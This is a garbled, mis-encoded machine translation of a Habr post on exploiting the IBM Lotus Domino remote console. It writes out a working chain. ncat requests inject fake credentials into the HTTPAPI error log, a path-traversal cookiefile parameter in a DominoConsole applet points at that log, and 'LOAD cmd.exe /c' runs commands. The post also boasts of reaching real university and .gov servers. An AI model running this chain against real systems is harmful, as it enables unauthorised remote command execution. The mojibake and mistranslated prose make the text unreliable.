рдРрд╕рд╛ рд▓рдЧрддрд╛ рд╣реИ рдХрд┐ рдкрд░реА рдХреА рдХрд╣рд╛рдиреА рдЦрддреНрдо рд╣реЛ рдЧрдИ рд╣реИред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдЖрдИрдмреАрдПрдо рдиреЗ рдЗрд╕ рд╕рдорд╕реНрдпрд╛ рдХреЗ рд▓рд┐рдП рдПрдХ рд╕рдорд╛рдзрд╛рди рдХрд┐рдпрд╛, рдФрд░ рдПрдХ рднреА рдирд╣реАрдВ! рдпреЗ рдирд╡рд╛рдЪрд╛рд░ рд╕рдВрд╕реНрдХрд░рдг 8.5.2FP3 рдФрд░ 8.5.3 рдХреЗ рдмрд╛рдж рд╕реЗ рдкреНрд░рдХрдЯ рд╣реБрдП рд╣реИрдВред

рд╕реБрдзрд╛рд░ резред





рдЕрдм, рдкреЛрд░реНрдЯ 2050 рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реИрдз рдХреНрд▓рд╛рдЗрдВрдЯ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдпрд╛рдиреА Ncat рдФрд░ Nmap рдЕрдм рдкреЛрд░реНрдЯ 2050 рдХреЗ рд╕рд╛рде рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддреЗ рд╣реИрдВред

рд╕реБрдзрд╛рд░ реиред





рдЕрдм рдлрд╝рд╛рдЗрд▓ рдирд╛рдо рд╕реЗ рдкрд╣рд▓реЗ "ред \" рдЬреЛрдбрд╝рд╛ рдЧрдпрд╛ рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рдЕрдм рд╣рдо UNC рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рднреЗрджреНрдпрддрд╛ рддрдпред рдкреИрдЪ рдкрд░реНрдпрд╛рдкреНрдд рд▓рдЧрддрд╛ рд╣реИред

рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдРрд╕рд╛ рдирд╣реАрдВ рд╣реИред рдлрд┐рд░ рд╕реЗ рдХреЛрдб рдХреА рддрд░реНрдЬ рдкрд░ рдПрдХ рдирдЬрд╝рд░ рдбрд╛рд▓реЗрдВ (рдкреЙрдЗрдВрдЯ.6 рдФрд░ рдкреНрд╡рд╛рдЗрдВрдЯ 7 рдХреЗ рд░реВрдк рдореЗрдВ рдЯрд┐рдкреНрдкрдгреА рдХреА рдЧрдИ рд╣реИ)ред GetStringToken рдлрд╝рдВрдХреНрд╢рди рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдПрдХ рд╡рд┐рдХрд▓реНрдк рд╣реИред рдЗрд╕рд▓рд┐рдП рдХрд╛рдлреА рд╕реНрдкрд╖реНрдЯ рдкреНрд░рд╢реНрди: рдЗрд╕ рдореЙрдбреНрдпреВрд▓ рдХреЛ рд▓рд╛рдЧреВ рдХрд░рддреЗ рд╕рдордп рдкреНрд░реЛрдЧреНрд░рд╛рдорд░ рдиреЗ рдЕрдкрдиреЗ рд╕реНрд╡рдпрдВ рдХреЗ XML рдкрд╛рд░реНрд╕рд░ рд▓рд┐рдЦрдиреЗ рдХрд╛ рд╕рд╣рд╛рд░рд╛ рдХреНрдпреЛрдВ рд▓рд┐рдпрд╛? рдЬрд╛рд╣рд┐рд░ рд╣реИ, рдпрд╣ рдкрд╛рд░реНрд╕рд░ рдХрд┐рд╕реА рднреА рдлрд╝рд╛рдЗрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рд╕рдВрдмрдВрдзрд┐рдд рд▓рд╛рдЗрдиреЗрдВ рд╣реЛрддреА рд╣реИрдВ: "<рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛", "рдирд╛рдо =", рдЖрджрд┐ред рджреВрд╕рд░реЗ рд╢рдмреНрджреЛрдВ рдореЗрдВ, рдпрд╣рд╛рдБ рд╣рдо рдЙрдореНрдореАрдж рдХрд░рддреЗ рд╣реИрдВ:

 <user name="usr" cookie="psw" address="dsecrg"> 


рд▓реЗрдХрд┐рди рдпрд╣рд╛рдБ рдХреНрдпрд╛ рдЖрдк рдореЗрдВ рдкрд░реНрдЪреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдпрд╣ рдмрд╕ рдХреЗ рд░реВрдк рдореЗрдВ рдЕрдЪреНрдЫреА рддрд░рд╣ рд╕реЗ рдкрд╛рд░реНрд╕ рд╣реИ:

 trashtrash<user sdsdasdsdname=тАЭusrтАЭsadasd asdnkasdk cookie=тАЭpswтАЭsssssaddress=тАЭdsecrgтАЭbf %> 


рдЗрд╕рдХрд╛ рдХреНрдпрд╛ рдорддрд▓рдм рд╣реИ? рдЬрд╛рд╣рд┐рд░ рд╣реИ, рд╣рдореЗрдВ рдХреЛрдб рдХреЗ рдПрдХ рд╣реА рдЦрдВрдб рдореЗрдВ рдПрдХ рдФрд░ рднреЗрджреНрдпрддрд╛ рдорд┐рд▓реАред рдЕрд░реНрдерд╛рддреН, рдПрдХ рд╕реНрдерд╛рдиреАрдп рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЬреЛрдбрд╝рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рдХреЗ рд╕рд╛рде рд╕рдВрдпреЛрдЬрди рдореЗрдВ (UNC рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЯреНрд░реИрд╡рд░реНрд╕рд▓ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЕрднреА рднреА рд╣реИ рдХрд┐ рд╣рдо рдХреИрд╕реЗ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ: #COOKIEFILE .. \ .. \ .. \ .. \ рдлрд╝рд╛рдЗрд▓ -> ред \ _ \ _ \ _)ред .. \ рдлрд╝рд╛рдЗрд▓), рдЖрдк рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдбреЗрдЯрд╛ рдХреЛ рдХрд┐рд╕реА рднреА рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП:

1. Microsoft HTTPAPI рд╕реЗрд╡рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ (рд╕рд╣реА рд╕рдордп рдкрд░ рдПрдХ рд╕реИрдиреНрдп, рджреБрд╢реНрдорди рд╕рд░реНрд╡рд░ рдкрд░ рдЗрд╕ рд▓реЙрдЧ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдзрдиреНрдпрд╡рд╛рдж рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдзрдиреНрдпрд╡рд╛рдж):

 C:\> ncat targethost 49152 GET /<user HTTP/1.0 C:\> ncat targethost 49152 GET /user="admin"cookie="pass"address="http://twitter/asintsov" HTTP/1.0 


рдпрд╣рд╛рдБ \ r \ n рдмрд╕ рджрд░реНрдЬ рдХрд░реЗрдВ!

2. рдЕрдм рд╕рд░реНрд╡рд░ рдкрд░ рд▓реЙрдЧ рдлрд╝рд╛рдЗрд▓ рдЗрд╕ рддрд░рд╣ рд╣реЛрдЧреА:

 #Software: Microsoft HTTP API 2.0 #Version: 1.0 #Date: 2011-08-22 09:19:16 #Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename 2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9 47001 - - - 400 - BadRequest - 2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9 47001 HTTP/1.0 GET / 404 - NotFound - 2011-08-26 11:53:30 10.10.10.101 52902 10.10.9.9 47001 HTTP/1.0 GET <user 404 - NotFound - 2011-08-26 11:53:30 10.10.10.101 52905 10.10.9.9 47001 HTTP/1.0 GET name="admin"cookie="pass"address="http://twitter/asintsov"> 404 - NotFound - 2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9 47001 - - - 400 - BadRequest - 


рджреЛ рдЕрдиреБрд░реЛрдз рд╕рдВрдпреЛрдЧ рд╕реЗ рдирд╣реАрдВ рдХрд┐рдП рдЧрдП рдереЗ, рдХреНрдпреЛрдВрдХрд┐ рдЖрдИрдмреАрдПрдо рдкрд╛рд░реНрд╕рд░ рд╕реНрдЯреНрд░рд┐рдВрдЧ "<рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛" рдХреЗ рд▓рд┐рдП рдПрдХ рд╕реНрдерд╛рди рдХреЗ рд╕рд╛рде рджрд┐рдЦреЗрдЧрд╛! рдФрд░ рдЕрдиреБрд░реЛрдз рдореЗрдВ рд╕рднреА рд░рд┐рдХреНрдд рд╕реНрдерд╛рди "% 20" рдХреЗ рд░реВрдк рдореЗрдВ рдПрдиреНрдХреЛрдб рдХрд┐рдП рдЧрдП рд╣реИрдВ, рдФрд░ рдЗрд╕рд▓рд┐рдП рдпрд╣ рд╣рдореЗрдВ рд╕реВрдЯ рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред рдлрд┐рд░ рд╣рдо рдкрд╣рд▓рд╛ рдЕрдиреБрд░реЛрдз рдХрд░рддреЗ рд╣реИрдВ рддрд╛рдХрд┐ "<рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛" рдХреЗ рдмрд╛рдж рд╡реЗрдм рд╕рд░реНрд╡рд░ рд╕реНрд╡рдпрдВ рдПрдХ рд╕реНрдерд╛рди (рдЕрдиреБрд░реЛрдз рдФрд░ рдкрд░рд┐рдгрд╛рдо "404 - рдиреЛрдЯрдлрд╝рд╛рдЙрдВрдб" рдХреЗ рдмреАрдЪ) рд╕реЗрдЯ рдХрд░реЗред рджреВрд╕рд░реА рдХреНрд╡реЗрд░реА рдХреЗ рд╕рд╛рде рд╣рдо рд╢реЗрд╖ рдХреЛ рдзрдХреНрдХрд╛ рджреЗрдВрдЧреЗред

рдЦреИрд░, рд▓рдЧрднрдЧ рд╕рдм рдХреБрдЫ рддреИрдпрд╛рд░ рд╣реИ, рдпрд╣ рдХреЗрд╡рд▓ 2050 рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдирд╛ рд╕реАрдЦрдирд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрд╕рдПрд╕рдПрд▓ рдкреНрд░рдорд╛рдг рдкрддреНрд░ рдирд╣реАрдВ рд╣реИред рдпрд╛ рд╣реИ? рдпрд╣ рдпрд╛рдж рд░рдЦрдирд╛ рдХрд┐ dconsole.jar рдПрдХ рдПрдкреНрд▓реЗрдЯ рдХреЗ рд░реВрдк рдореЗрдВ рдХреНрд▓рд╛рдЗрдВрдЯ рднрд╛рдЧ рдХреЗ рд▓рд┐рдП рднреА рдЬрд┐рдореНрдореЗрджрд╛рд░ рд╣реИ, рдпрд╣ рд╕реНрдкрд╖реНрдЯ рд╣реИ рдХрд┐ рд╡рд╣рд╛рдВ рдПрдХ рдкреНрд░рдорд╛рдг рдкрддреНрд░ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП - рдФрд░ рдпрд╣ рд╡рд╣рд╛рдВ рд╣реИред рдФрд░ рдХреБрдВрдЬреА рд╡рд╣рд╛рдБ рд╣реИред рд╕рдм рдХреБрдЫ рд╣реИред рд╕рд┐рджреНрдзрд╛рдВрдд рд░реВрдк рдореЗрдВ, рдЖрдк рдХреБрдВрдЬреА рдХреЛ рдЦреАрдВрдЪ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдПрдХ рд╢реЛрд╖рдг рд▓рд┐рдЦ рд╕рдХрддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдпрджрд┐ рдЖрдк рдмрд╣реБрдд рдЖрд▓рд╕реА рд╣реИрдВ, рддреЛ рдЖрдк рд╕реАрдзреЗ рдЗрд╕ рдПрдкрд▓реЗрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

 <applet name = "DominoConsole" code = "lotus.domino.console.DominoConsoleApplet.class" codebase = "http://127.0.0.1/domjava/" archive = "dconsole.jar" width = "100%" height = "99%тАЬ> <PARAM NAME="debug" VALUE="true"> <PARAM NAME="port" VALUE="2050"> <PARAM NAME="useraddress" VALUE="http://twitter/asintsov"> <PARAM NAME="username" VALUE="admin"> <PARAM NAME="cookiefile" VALUE="\..\..\..\windows\system32\logfiles\httperr\httperr1.log"> <PARAM NAME="cookievalue" VALUE="pass"> <PARAM NAME="onLoad" VALUE="onLoadConsole"> </applet> 


рд╣рдо рдЗрд╕ рдПрдкреНрд▓реЗрдЯ рдХреЛ рдХрд┐рд╕реА рднреА рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рд▓реЛрдб рдХрд░рддреЗ рд╣реИрдВ, рд╕реНрдерд╛рдиреАрдп рдкреЛрд░реНрдЯ 2050 рд╕реЗ рд░рд┐рдореЛрдЯ рдПрдХ рдореЗрдВ рдПрдХ рд░реАрдбрд╛рдпрд░реЗрдХреНрдЯ рдХреЛ рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ, рдФрд░ рдпрд╣ рд╣реИ - рдкреНрд░рднрд╛рд╡ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддрд╛ рд╣реИред рд╡реАрдбрд┐рдпреЛ рдЙрджрд╛рд╣рд░рдг:

рдХрдВрд╕реЛрд▓ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрди рдЖрджреЗрд╢ред рд╡рд┐рдХрд▓реНрдк 1:

LOAD cmd.exe /c command

рдХрдВрд╕реЛрд▓ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрди рдЖрджреЗрд╢ред рд╡рд┐рдХрд▓реНрдк 2:

$ command

рд╕рдВрд░рдХреНрд╖рдг:



рдиреЛрдЯ:

рдЙрдкрд░реЛрдХреНрдд рд╕рднреА рд╡рд┐рдХрд▓реНрдкреЛрдВ рдореЗрдВ рд╣рдорд▓рд╛рд╡рд░, рдкреНрд░рдорд╛рдгреАрдХрд░рдгреЛрдВ рдХреЛ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╕рд╣реА рд▓реЙрдЧрд┐рди рдорд╛рди рдЬрд╛рдирдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдХрд┐рд╕реА рднреА рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рдпрд╣ рдЧрдгрдирд╛ рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдЧреИрд░-рдореМрдЬреВрдж рд▓реЙрдЧрд┐рди рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ, NOT_REG_ADMIN рддреНрд░реБрдЯрд┐ рдЙрддреНрдкрдиреНрди рд╣реЛрддреА рд╣реИ, рдФрд░ рдпрджрд┐ рдкрд╛рд╕рд╡рд░реНрдб рдЧрд▓рдд рд╣реИ, рддреЛ WRONG_PASSWORD (Point.9)ред

рдЗрдВрдЯрд░рдиреЗрдЯ рд╕реЗ PS рд╣рдорд▓рд╛



рд╕рдмрдиреЗрдЯ рдореЙрд╕реНрдХреЛ рдпреВрдирд┐рд╡рд░реНрд╕рд┐рдЯреА:



.Gov рдбреЛрдореЗрди, рдпрд╛ рдЕрдореЗрд░рд┐рдХреА рд╡реИрдЬреНрдЮрд╛рдирд┐рдХреЛрдВ рдХреЛ рдлрд╛рдпрд░рд╡реЙрд▓ рдкрд╕рдВрдж рдирд╣реАрдВ рд╣реИ:



рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рдЖрдИрдмреАрдПрдо рд╕реНрд╡рдпрдВ рдкреЛрд░реНрдЯ 2050 рдХреЛ рдлрд╝рд┐рд▓реНрдЯрд░ рдирд╣реАрдВ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рд▓реЛрдЯрд╕ рдХреЛ рдЕрдкрдбреЗрдЯ рдХрд░ рд╕рдХрддрд╛ рд╣реИ (+ рд▓реЙрдЧрд┐рди рдХрд╛ рдЕрдиреБрдорд╛рди рд▓рдЧрд╛рдиреЗ рдХрд╛ рдПрдХ рдкреНрд░рджрд░реНрд╢рди):



рдирд┐рд╖реНрдХрд░реНрд╖




... рдФрд░ рдлрд┐рд░ рднреА 0day рдХрдордЬреЛрд░рд┐рдпрд╛рдВ рднрдпрд╛рдирдХ рдирд╣реАрдВ рд╣реИрдВред

Source: https://habr.com/ru/post/In141275/


All Articles